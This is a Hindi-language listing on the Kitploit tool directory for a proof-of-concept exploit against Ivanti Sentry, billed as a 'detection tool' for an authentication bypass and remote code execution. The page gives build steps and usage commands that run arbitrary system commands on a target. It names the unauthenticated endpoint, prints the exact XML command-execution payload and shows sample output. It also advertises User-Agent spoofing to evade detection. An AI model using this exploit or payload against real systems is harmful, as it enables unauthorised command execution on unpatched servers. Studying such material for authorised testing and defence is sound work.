Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-10523-Ivanti-sentry — Ivanti Sentry प्रमाणीकरण बाईपास और दूरस्थ कोड निष्पादन भेद्यता (CVE-2026-10520, CVE-2026-10523) के लिए प्रूफ-ऑफ-कॉन्सेप्ट डिटेक्शन टूल। सिस्टम कमांड निष्पादित करने और कमजोर परिनियोजन को मान्य करने के लिए क्राफ्टेड API अनुरोध भेजता है। | Kitploit
उपकरण/GitHubGitHub/gagaltotal/cve-2026-10523-ivanti-sentry
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोलप्रमाणीकरण
GitHubgagaltotal/cve-2026-10523-ivanti-sentry

CVE-2026-10523-Ivanti-sentry

Ivanti Sentry प्रमाणीकरण बाईपास और दूरस्थ कोड निष्पादन भेद्यता (CVE-2026-10520, CVE-2026-10523) के लिए प्रूफ-ऑफ-कॉन्सेप्ट डिटेक्शन टूल। सिस्टम कमांड निष्पादित करने और कमजोर परिनियोजन को मान्य करने के लिए क्राफ्टेड API अनुरोध भेजता है।

रिपॉजिटरी देखेंवेबसाइट
3132 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-10523 - Ivanti Sentry RCE डिटेक्शन टूल

Ivanti Sentry में प्रमाणीकरण बायपास और रिमोट कोड निष्पादन से संबंधित कमजोरियों के परीक्षण के लिए एक व्यापक प्रूफ-ऑफ-कॉन्सेप्ट डिटेक्शन टूल। यह टूल CVE-2026-10520 और CVE-2026-10523 के प्रति संवेदनशील सिस्टम की पहचान करता है।

अवलोकन

यह प्रोजेक्ट यह पता लगाने और सत्यापित करने के लिए डिज़ाइन किया गया है कि कोई Ivanti Sentry इंस्टेंस महत्वपूर्ण प्रमाणीकरण बायपास और रिमोट कोड निष्पादन दोषों के प्रति संवेदनशील है या नहीं। यह टूल Ivanti Sentry API एंडपॉइंट के माध्यम से विशेष रूप से तैयार किए गए संदेश भेजकर सिस्टम कमांड को निष्पादित करता है और परिणाम निकालता है, जिससे सुरक्षा शोधकर्ता और पेनिट्रेशन परीक्षक संवेदनशील डिप्लॉयमेंट की पहचान कर सकते हैं।

कमजोरी विवरण

CVE-2026-10520

Ivanti Sentry में प्रमाणीकरण बायपास कमजोरी, जो प्रतिबंधित API एंडपॉइंट्स तक अप्रमाणित पहुँच की अनुमति देती है।

CVE-2026-10523

Ivanti Sentry में रिमोट कोड निष्पादन कमजोरी, जो प्रमाणीकरण बायपास के साथ संयुक्त होने पर मैसेजिंग API के माध्यम से मनमाने सिस्टम कमांड के निष्पादन की अनुमति देती है।

विशेषताएँ

  • संवेदनशील Ivanti Sentry इंस्टेंस की अप्रमाणित पहचान
  • सिस्टम कमांड निष्पादन क्षमता (प्रूफ-ऑफ-कॉन्सेप्ट सत्यापन के लिए)
  • TLS सत्यापन बायपास के साथ HTTP और HTTPS कनेक्शन का समर्थन
  • मध्यस्थों के माध्यम से परीक्षण के लिए प्रॉक्सी समर्थन
  • XML प्रतिक्रियाओं से स्वच्छ कमांड आउटपुट निष्कर्षण
  • सूचनात्मक फीडबैक के साथ सुरक्षित त्रुटि प्रबंधन
  • कॉन्फ़िगरेबल टाइमआउट और प्रतिक्रिया आकार सीमा
  • आवश्यकताएँ

    • Go 1.26.4 या उच्चतर
    • लक्ष्य Ivanti Sentry इंस्टेंस तक नेटवर्क पहुँच
    • मान्य लक्ष्य URL (प्रोटोकॉल HTTP या HTTPS सहित)

    स्थापना

    रिपॉजिटरी को क्लोन करें और प्रोजेक्ट निर्देशिका में नेविगेट करें:

    root@kitploit:~
    git clone https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry
    cd CVE-2026-10523-Ivanti-sentry
    

    इनिशियलाइज़ेशन और पैकेज लाइब्रेरी प्राप्त करें:

    root@kitploit:~
    go mod init CVE-2026-10523-Ivanti-sentry
    go mod tidy
    

    एक्जीक्यूटेबल बनाएँ:

    root@kitploit:~
    go build -o tot_poc tot_poc.go
    

    उपयोग

    Screen Capture

    इस टूल को दो अनिवार्य पैरामीटर की आवश्यकता है: लक्ष्य URL और निष्पादित करने के लिए कमांड।

    मूल उपयोग

    Screen Capture

    लक्ष्य पर एक सरल कमांड चलाएँ:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "uname -a"
    

    कमांड लाइन विकल्प

    • -url (अनिवार्य): प्रोटोकॉल सहित लक्ष्य का बेस URL (जैसे, https://127.0.0.1:8443)
    • -cmd (अनिवार्य): कमजोरी का पता लगाने के लिए निष्पादित करने का कमांड (जैसे, "uname -a", "id", "whoami")
    • -p या -proxy (वैकल्पिक): ट्रैफ़िक को रूट करने के लिए प्रॉक्सी पता और पोर्ट (जैसे, 127.0.0.1:8080)

    उपयोग उदाहरण

    Screen Capture

    सरल सिस्टम जानकारी कमांड के साथ कमजोरी का पता लगाएँ:

    root@kitploit:~
    ./tot_poc -url https://192.168.1.100:8443 -cmd "uname -a"
    

    प्रॉक्सी कॉन्फ़िगरेशन के साथ चलाएँ:

    root@kitploit:~
    ./tot_poc -url https://target.example.com:8443 -cmd "whoami" -proxy 127.0.0.1:8080
    

    सिस्टम जानकारी निकालने के लिए कमांड निष्पादित करें:

    root@kitploit:~
    ./tot_poc -url https://sentry-instance.internal:8443 -cmd "cat /etc/os-release"
    

    आउटपुट

    टूल प्रदर्शित करेगा:

    1. कमजोरी जानकारी वाला एक बैनर
    2. लक्ष्य URL, कमांड और प्रॉक्सी कॉन्फ़िगरेशन (यदि लागू हो)
    3. अनुरोध प्रगति दर्शाने वाले रीयल-टाइम स्टेटस संदेश
    4. यदि लक्ष्य संवेदनशील है तो कमांड निष्पादन के परिणाम
    5. यदि लक्ष्य संवेदनशील नहीं है या कनेक्शन विफल होता है तो त्रुटि संदेश

    सफल डिटेक्शन आउटपुट

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [+] Target appears to be vulnerable.
    
    Command output:
    Linux sentry-server 5.10.0-8-generic x86_64 GNU/Linux
    

    असफल डिटेक्शन आउटपुट

    root@kitploit:~
    Target: https://192.168.1.100:8443
    Command: uname -a
    
    [+] Sending command execution check to: https://192.168.1.100:8443/mics/api/v2/sentry/mics-config/handleMessage
    [-] Target does not appear to be vulnerable.
    

    तकनीकी विवरण

    हमला वेक्टर

    यह टूल /mics/api/v2/sentry/mics-config/handleMessage एंडपॉइंट का शोषण करता है, जो प्रमाणीकरण के बिना सुलभ है। पेलोड इस प्रकार बनाया गया है:

    root@kitploit:~
    message=execute+system+/configuration/system/commandexec+<commandexec><index>1</index><reqandres>[COMMAND]</reqandres></commandexec>
    

    प्रतिक्रिया में कमांड आउटपुट success टैग के भीतर XML प्रारूप में होता है।

    सुरक्षा सुविधाएँ

    • स्व-हस्ताक्षरित प्रमाणपत्रों के परीक्षण के लिए TLS सत्यापन बायपास
    • अनुरोधों को लटकने से रोकने के लिए कॉन्फ़िगरेबल HTTP टाइमआउट
    • मेमोरी खत्म होने से रोकने के लिए प्रतिक्रिया आकार सीमा (10 MB)
    • दोषपूर्ण प्रतिक्रियाओं के लिए उचित त्रुटि प्रबंधन
    • सरल डिटेक्शन तंत्र से बचने के लिए User-Agent स्पूफिंग

    यह कैसे काम करता है

    1. लक्ष्य URL और कमांड के लिए कमांड-लाइन तर्क पार्स करें
    2. वैकल्पिक प्रॉक्सी कॉन्फ़िगरेशन के साथ HTTP क्लाइंट बनाएँ
    3. उपयोगकर्ता द्वारा प्रदान किए गए कमांड के साथ पेलोड बनाएँ
    4. संवेदनशील एंडपॉइंट पर POST अनुरोध भेजें
    5. XML प्रतिक्रिया संरचना से कमांड आउटपुट निकालें
    6. तदनुसार परिणाम या त्रुटि संदेश प्रदर्शित करें

    अस्वीकरण

    यह टूल केवल अधिकृत सुरक्षा परीक्षण और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। उपयोगकर्ता पूरी तरह से यह सुनिश्चित करने के लिए जिम्मेदार हैं कि किसी भी सिस्टम का परीक्षण करने से पहले उनके पास उचित प्राधिकरण हो। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है। लेखक इस टूल के दुरुपयोग या इससे होने वाली क्षति के लिए कोई दायित्व नहीं मानते हैं।

    आवश्यकताएँ और सीमाएँ

    • लक्ष्य एक संवेदनशील Ivanti Sentry इंस्टेंस होना चाहिए
    • लक्ष्य सिस्टम तक नेटवर्क कनेक्टिविटी आवश्यक है
    • प्रति अनुरोध डिफ़ॉल्ट टाइमआउट 10 सेकंड है
    • अधिकतम प्रतिक्रिया आकार 10 MB तक सीमित है
    • केवल Ivanti Sentry के संवेदनशील संस्करणों पर प्रभावी
    • परीक्षण उद्देश्यों के लिए TLS प्रमाणपत्र सत्यापन अक्षम किया गया है

    लेखक

    GhostGTR666 - Gagaltotal666

    रिपॉजिटरी

    https://github.com/gagaltotal/CVE-2026-10523-Ivanti-sentry

    लाइसेंस

    यह प्रोजेक्ट सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए जैसा है वैसा प्रदान किया गया है।

    संदर्भ

    • CVE-2026-10520: Ivanti Sentry प्रमाणीकरण बायपास
    • CVE-2026-10523: Ivanti Sentry रिमोट कोड निष्पादन
    टूल डाउनलोड करें